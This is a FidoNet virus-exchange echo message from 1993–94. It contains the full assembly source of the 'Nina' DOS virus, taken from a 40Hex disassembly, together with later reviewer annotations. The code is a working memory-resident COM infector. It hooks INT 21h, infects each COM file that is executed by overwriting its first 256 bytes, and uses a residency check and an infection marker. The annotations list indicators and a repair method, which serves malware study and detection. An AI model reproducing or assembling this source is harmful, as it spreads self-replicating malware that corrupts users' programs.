|
;- PVT.VIRII (2:465/65.4) ----------------------------------------- PVT.VIRII -
|
|||
|
; Msg : 35 of 54
|
|||
|
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:14
|
|||
|
; To : - *.* - Fri 11 Nov 94 08:10
|
|||
|
; Subj : NINA.ASM
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
;.RealName: Max Ivanov
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
;* Kicked-up by MeteO (2:5030/136)
|
|||
|
;* Area : VIRUS (Int: <20><><EFBFBD><EFBFBD>p<EFBFBD><70><EFBFBD><EFBFBD><EFBFBD> <20> <20><>p<EFBFBD><70><EFBFBD><EFBFBD>)
|
|||
|
;* From : Daniel Hendry, 2:283/718 (06 Nov 94 17:37)
|
|||
|
;* To : Viral Doctor
|
|||
|
;* Subj : NINA.ASM
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
;@RFC-Path:
|
|||
|
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
|
|||
|
;18.n283!not-for-mail
|
|||
|
;@RFC-Return-Receipt-To: Daniel.Hendry@f718.n283.z2.fidonet.org
|
|||
|
; Analysis notes (reviewer): 16-bit real-mode DOS code in MASM/TASM-style
; syntax (.model/.code directives, `offset`, `byte ptr`, `retn`), assembled
; as a tiny-model .COM image. The listing is a disassembly of a
; memory-resident COM file infector, kept here for study.
; Indicators visible in this listing:
;   - INT 21h issued with AX=9753h (residency self-check at `start`)
;   - word 9753h at offset 2 of a file (the "already infected" test in `infect`)
;   - INT 91h vector set to the previous INT 21h handler (`highentry`)
;   - the ASCII literal 'Nina' immediately before `endvirus`
.model tiny
|
|||
|
.code
|
|||
|
org 100h ; COM entry offset; every `offset` below is relative to this origin
|
|||
|
; Disassembly done by Dark Angel of Phalcon/Skism
|
|||
|
; for 40Hex Number 9, Volume 2 Issue 5
|
|||
|
; start -- entry point of an infected COM file.
; Flow as written:
;   1. INT 21h with AX=9753h. If a resident copy already owns INT 21h, its
;      handler (int21 -> exit_install) does not return here; it drops the
;      interrupt frame and jumps to return_COM.
;   2. Otherwise: resize the block at ES to (MCB size - 40h) paragraphs,
;      allocate 3Fh paragraphs, copy 100h bytes of this code into the new
;      block and far-return into the copy at highentry.
; Stack on leaving this block: AX, BX, ES pushed in that order; highentry
; pops ES and BX, return_COM pops AX.
; NOTE(review): ES is presumably the program's own PSP segment at entry
; (normal for a COM file) -- not shown in this listing.
start:
|
|||
|
push ax ; saved entry AX; popped in return_COM
|
|||
|
mov ax,9753h ; installation check
|
|||
|
int 21h ; answered only by a resident copy's int21 handler
|
|||
|
mov ax,ds
|
|||
|
dec ax ; one paragraph below the current data segment
|
|||
|
mov ds,ax ; ds->program MCB
|
|||
|
mov ax,ds:[3] ; get size word
|
|||
|
push bx ; popped in highentry
|
|||
|
push es ; popped in highentry (into DS)
|
|||
|
sub ax,40h ; reserve 40h paragraphs
|
|||
|
mov bx,ax ; bx = new block size in paragraphs
|
|||
|
mov ah,4Ah ; Shrink memory allocation
|
|||
|
int 21h ; result/carry is not examined
|
|||
|
|
|||
|
mov ah,48h ; Allocate 3Fh paragraphs
|
|||
|
mov bx,3Fh ; for the virus
|
|||
|
int 21h ; ax = segment of the new block; carry is not examined
|
|||
|
|
|||
|
mov es,ax ; copy virus to high
|
|||
|
xor di,di ; memory
|
|||
|
mov si,offset start + 10h ; start at MCB:110h
|
|||
|
mov cx,100h ; (same as PSP:100h)
|
|||
|
rep movsb ; 100h bytes: ds:110h -> new block:0000
|
|||
|
sub ax,10h ; adjust offset as if it
|
|||
|
push ax ; originated at 100h
|
|||
|
mov ax,offset highentry
|
|||
|
push ax
|
|||
|
retf ; far return = jump to (new block - 10h):highentry
|
|||
|
|
|||
|
endfile dw 100h ; host size recorded by infect before it appends; the saved first 100h host bytes start at this file offset
|
|||
|
|
|||
|
; highentry -- first code executed inside the relocated copy.
; CS here is (new block segment - 10h), so offsets assembled for org 100h
; still resolve inside the copy.
; Actions, in order: patch one byte of the new block's MCB, save the current
; INT 21h vector in oldint21, point INT 91h at that saved handler, install
; int21 as the INT 21h handler. Then pops the ES/BX saved by start and falls
; through into return_COM with DS = ES = that popped segment.
; Triage note: after this runs, INT 91h and the far-jump operand at oldint21
; both hold the pre-infection INT 21h handler address.
highentry:
|
|||
|
mov byte ptr cs:[0F2h],0AAh ; change MCB's owner so the
|
|||
|
; memory isn't freed when the
|
|||
|
; program terminates
|
|||
|
mov ax,3521h ; get int 21h vector
|
|||
|
int 21h ; returns the current handler in es:bx
|
|||
|
|
|||
|
mov word ptr cs:oldint21,bx ; save it
|
|||
|
mov word ptr cs:oldint21+2,es ; segment half of the far-jump operand
|
|||
|
push es
|
|||
|
pop ds ; ds:dx = old int 21h handler for the set-vector call
|
|||
|
mov dx,bx
|
|||
|
mov ax,2591h ; redirect int 91h to int 21h
|
|||
|
int 21h
|
|||
|
|
|||
|
push cs
|
|||
|
pop ds ; ds:dx = cs:int21
|
|||
|
mov dx,offset int21
|
|||
|
mov al,21h ; set int 21h to virus vector
|
|||
|
int 21h ; AH is assumed to still hold 25h from the call above
|
|||
|
|
|||
|
pop ds ; ds->original program PSP
|
|||
|
pop bx ; restores the BX pushed in start
|
|||
|
push ds
|
|||
|
pop es ; es = ds for the copy in return_COM
|
|||
|
; return_COM -- hands control back to the host program.
; Reached by fall-through from highentry (first install) or by the jump in
; exit_install (already resident). In both cases one word -- the AX pushed
; at start -- is still on the stack.
; Copies 100h bytes from ds:(endfile + 100h) to es:100h, i.e. the host's
; original first 100h bytes (stored at file offset `endfile` by infect) back
; over the entry code, then far-returns to ds:100h.
; NOTE(review): `mov si,endfile` is a memory load through DS, so the value
; comes from the copy of this code in the running program's segment.
return_COM:
|
|||
|
mov di,100h ; restore original
|
|||
|
mov si,endfile ; file
|
|||
|
add si,di ; adjust for COM starting
|
|||
|
mov cx,100h ; offset
|
|||
|
rep movsb ; overwrites es:100h..1FFh with the saved host bytes
|
|||
|
pop ax ; restores the AX pushed at start
|
|||
|
push ds ; jmp back to original
|
|||
|
mov bp,100h ; file (PSP:100)
|
|||
|
push bp
|
|||
|
retf ; far return to ds:100h
|
|||
|
; exit_install -- taken from int21 when AX=9753h, i.e. when a newly started
; infected file finds a copy already resident.
; Discards the three words of the interrupt frame (IP, CS, FLAGS) so the
; handler never returns to the caller, then jumps to return_COM, which
; restores and runs the host. Executes inside the resident copy's segment;
; DS and ES are still whatever the caller had at its INT 21h.
exit_install:
|
|||
|
pop ax ; pop CS:IP and flags in
|
|||
|
pop ax ; order to balance the
|
|||
|
pop ax ; stack and then exit the
|
|||
|
jmp short return_COM ; infected COM file
|
|||
|
; int21 -- resident INT 21h handler installed by highentry.
;   AX=9753h : residency check from an infected file   -> exit_install
;   AX=4B00h : execute request; the caller's DS:DX is handed to infect
;   other    : passed unchanged to the previous handler
; AX, BX, CX, DX and DS are saved around the call to infect, so the original
; request reaches the previous handler with those registers intact.
; exitint21 is a hand-assembled far jump: opcode byte 0EAh followed by the
; 4-byte operand oldint21, which highentry fills with the saved vector.
int21:
|
|||
|
cmp ax,9753h ; installation check?
|
|||
|
je exit_install
|
|||
|
cmp ax,4B00h ; execute?
|
|||
|
jne exitint21 ; nope, quit
|
|||
|
push ax ; save registers
|
|||
|
push bx
|
|||
|
push cx
|
|||
|
push dx
|
|||
|
push ds
|
|||
|
call infect ; ds:dx still as supplied by the caller of int 21h
|
|||
|
pop ds ; restore registers
|
|||
|
pop dx
|
|||
|
pop cx
|
|||
|
pop bx
|
|||
|
pop ax
|
|||
|
exitint21:
|
|||
|
db 0eah ; jmp far ptr
|
|||
|
oldint21 dd ? ; offset:segment of the previous int 21h handler (written in highentry)
|
|||
|
|
|||
|
; infect -- called from int21 on AX=4B00h.
; In:  DS:DX as passed by the program that issued the execute request
;      (presumably the path of the file to run -- not shown in this listing).
; All DOS calls go through INT 91h, which highentry pointed at the previous
; INT 21h handler, so they do not re-enter int21.
; Steps as written:
;   1. open the file read/write; give up if the open fails
;   2. read its first 100h bytes into the buffer at endvirus
;   3. skip files starting with 'MZ' or 'ZM', and files with 9753h at offset 2
;   4. seek to end; skip if the low word of the size is above 0FEB0h or
;      below 1F4h (the high word of the size is not looked at)
;   5. record that size in endfile, append the 100h saved bytes at the end
;   6. seek to start and write 100h bytes from ds:100h (this code) over the
;      beginning of the file
;   7. close the handle
; Layout of a modified file, useful for identification and repair: length
; grows by 100h; bytes 0..0FFh are this code; the last 100h bytes are the
; original first 100h bytes. Copying the last 100h bytes back to offset 0
; and truncating by 100h reverses steps 5-6.
; NOTE(review): the 9753h at offset 2 presumably is the immediate operand of
; `mov ax,9753h` at start+1 (after the one-byte `push ax`) -- confirm against
; an assembled image.
; Clobbers AX, BX, CX, DX, DS (saved by the caller). Results of the read and
; write calls are not checked.
infect:
|
|||
|
mov ax,3D02h ; open file read/write
|
|||
|
int 91h
|
|||
|
jc exit_infect ; open failed: nothing to close
|
|||
|
mov bx,ax ; bx = file handle for every call below
|
|||
|
mov cx,100h ; byte count for the read
|
|||
|
push cs
|
|||
|
pop ds ; ds = resident copy's segment from here on
|
|||
|
mov ah,3Fh ; Read first 100h bytes
|
|||
|
mov dx,offset endvirus ; buffer directly after the resident code
|
|||
|
int 91h
|
|||
|
mov ax,word ptr endvirus ; first two bytes of the file
|
|||
|
cmp ax,'MZ' ; exit if EXE
|
|||
|
je close_exit_infect
|
|||
|
cmp ax,'ZM' ; exit if EXE
|
|||
|
je close_exit_infect
|
|||
|
cmp word ptr endvirus+2,9753h ; exit if already
|
|||
|
je close_exit_infect ; infected
|
|||
|
mov al,2 ; go to end of file
|
|||
|
call move_file_pointer ; ax = low word of the file size
|
|||
|
cmp ax,0FEB0h ; exit if too large
|
|||
|
ja close_exit_infect
|
|||
|
cmp ax,1F4h ; or too small for
|
|||
|
jb close_exit_infect ; infection
|
|||
|
mov endfile,ax ; save file size
|
|||
|
call write ; dx still = offset endvirus: appends the saved 100h bytes
|
|||
|
mov al,0 ; go to start of file
|
|||
|
call move_file_pointer
|
|||
|
mov dx,100h ; write virus
|
|||
|
call write ; ds:100h, 100h bytes, over the start of the file
|
|||
|
close_exit_infect:
|
|||
|
mov ah,3Eh ; Close file
|
|||
|
int 91h
|
|||
|
exit_infect:
|
|||
|
retn
|
|||
|
|
|||
|
; move_file_pointer -- seek helper: INT 21h AH=42h issued through INT 91h
; with a zero offset in CX:DX.
; In:  AL = origin (infect passes 0 = start of file, 2 = end of file)
;      BX = file handle
; Out: AX = low word of the resulting position; the high word returned in
;      DX is overwritten when the caller's DX is popped back.
; Clobbers: AX, CX, flags. DX is preserved.
move_file_pointer:
|
|||
|
push dx ; keep the caller's buffer offset
|
|||
|
xor cx,cx
|
|||
|
xor dx,dx ; cx:dx = 0 offset
|
|||
|
mov ah,42h ; al (origin) was set by the caller
|
|||
|
int 91h
|
|||
|
pop dx ; discards the high word of the position
|
|||
|
retn
|
|||
|
|
|||
|
; write -- write helper: INT 21h AH=40h issued through INT 91h with a fixed
; length of 100h bytes.
; In:  BX = file handle, DS:DX = buffer
; Out: whatever the DOS call leaves in AX and carry; neither caller in
;      infect examines it.
; Clobbers: AX, CX, flags.
write:
|
|||
|
mov ah,40h
|
|||
|
mov cx,100h ; fixed byte count
|
|||
|
int 91h
|
|||
|
retn
|
|||
|
|
|||
|
; Tail of the image: a 4-byte ASCII marker, then `endvirus`, which serves
; both as the end-of-code label and as the 100h-byte read buffer used by
; infect. The single instruction after it is the stand-in host program of
; this first-generation listing.
; NOTE(review): the copy and write lengths elsewhere are all 100h, so
; `endvirus` is presumably at or before offset 200h -- confirm against an
; assembled image before relying on an exact offset for the 'Nina' marker.
db 'Nina' ; plain-text marker, not referenced by any instruction shown
|
|||
|
endvirus:
|
|||
|
int 20h ; original COM file
|
|||
|
|
|||
|
end start
|
|||
|
|
|||
|
;-+- Terminate 1.50/Pro
|
|||
|
; + Origin: Rampton Birds' Box, +358-31-3564751, 28.800bps, 24h (2:283/718)
|
|||
|
;=============================================================================
|
|||
|
;
|
|||
|
;Yoo-hooo-oo, -!
|
|||
|
;
|
|||
|
;
|
|||
|
; <20> The Me<4D>eO
|
|||
|
;
|
|||
|
;/yx Extended memory swapping
|
|||
|
;
|
|||
|
;--- Aidstest Null: /Kill
|
|||
|
; * Origin: <20>PVT.ViRII<49>main<69>board<72> / Virus Research labs. (2:5030/136)
|
|||
|
|